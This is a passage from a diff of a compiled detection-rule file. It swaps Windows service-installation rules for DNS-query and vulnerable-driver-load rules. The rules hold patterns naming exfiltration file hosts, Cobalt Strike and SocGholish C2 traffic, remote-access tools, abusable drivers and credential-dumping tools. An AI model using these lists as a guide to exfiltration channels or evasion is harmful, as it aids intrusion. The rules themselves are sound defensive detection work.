'%servicebus.windows.net%' ESCAPE '\\' AND NewProcessName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "win_system_susp_dhcp_config_failed.yml" + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "title": "Potential SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "Service Installation in Suspicious Folder", - "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "title": "DNS Query for Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", "status": "experimental", - "description": "Detects service installation in suspicious folder appdata", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", "author": "pH-T (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Rare legitimate access to anonfiles.com" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) AND NOT ((ServiceName = 'Zoom Sharing Service' AND ImagePath LIKE '\"C:\\\\Program Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE QueryName LIKE '%.anonfiles.com%' ESCAPE '\\'" ], - "filename": "win_system_susp_service_installation_folder.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "PAExec Service Installation", - "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", - "status": "experimental", - "description": "Detects PAExec service installation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious DNS Query for IP Lookup Service APIs", + "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", + "status": "test", + "description": "Detects DNS queries for IP lookup services such as \"api.ipify.org\" originating from a non browser process.", + "author": "Brandon George (blog post), Thomas Patzke (rule)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.reconnaissance", + "attack.t1590" ], "falsepositives": [ - "Unknown" + "Legitimate usage of IP lookup services such as ipify API" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((QueryName LIKE '%api.2ip.ua%' ESCAPE '\\' OR QueryName LIKE '%api.ipify.org%' ESCAPE '\\' OR QueryName LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%canireachthe.net%' ESCAPE '\\' OR QueryName LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR QueryName LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR QueryName LIKE '%curlmyip.com%' ESCAPE '\\' OR QueryName LIKE '%edns.ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%eth0.me%' ESCAPE '\\' OR QueryName LIKE '%freegeoip.app%' ESCAPE '\\' OR QueryName LIKE '%icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ident.me%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.io%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.me%' ESCAPE '\\' OR QueryName LIKE '%ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%ip.anysrc.net%' ESCAPE '\\' OR QueryName LIKE '%ip.tyk.nu%' ESCAPE '\\' OR QueryName LIKE '%ipaddressworld.com%' ESCAPE '\\' OR QueryName LIKE '%ipecho.net%' ESCAPE '\\' OR QueryName LIKE '%ipinfo.io%' ESCAPE '\\' OR QueryName LIKE '%ipof.in%' ESCAPE '\\' OR QueryName LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%ipwho.is%' ESCAPE '\\' OR QueryName LIKE '%l2.io%' ESCAPE '\\' OR QueryName LIKE '%myexternalip.com%' ESCAPE '\\' OR QueryName LIKE '%wgetip.com%' ESCAPE '\\' OR QueryName LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR QueryName LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_service_install_paexec.yml" + "filename": "dns_query_win_susp_ipify.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", - "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious LDAP Domain Access", + "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", + "status": "experimental", + "description": "Detect suspicious LDAP request from non-Windows application", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" ], - "filename": "win_system_apt_stonedrill.yml" + "filename": "dns_query_win_susp_ldap.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "title": "Suspicious TeamViewer Domain Access", + "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Unknown binary names of TeamViewer", + "Other programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE (QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (NewProcessName LIKE '%TeamViewer%' ESCAPE '\\'))" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_susp_teamviewer.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE QueryName LIKE '%ufile.io%' ESCAPE '\\'" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "Eventlog Cleared", - "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", + "title": "DNS Query To Remote Access Software Domain", + "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "status": "experimental", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113, Connor Martin", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Likely with other browser software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" + "SELECT * FROM logs WHERE ((QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE '%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE '%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE '%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE '%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE '%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_eventlog_cleared.yml" + "filename": "dns_query_win_remote_access_software_domains.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", "status": "experimental", - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", - "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "status": "experimental", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "New PDQDeploy Service - Client Side", - "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + "id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", "attack.t1543.003" ], "falsepositives": [ - "Legitimate use of the tool" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" ], - "filename": "win_system_service_install_pdqdeploy_runner.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": 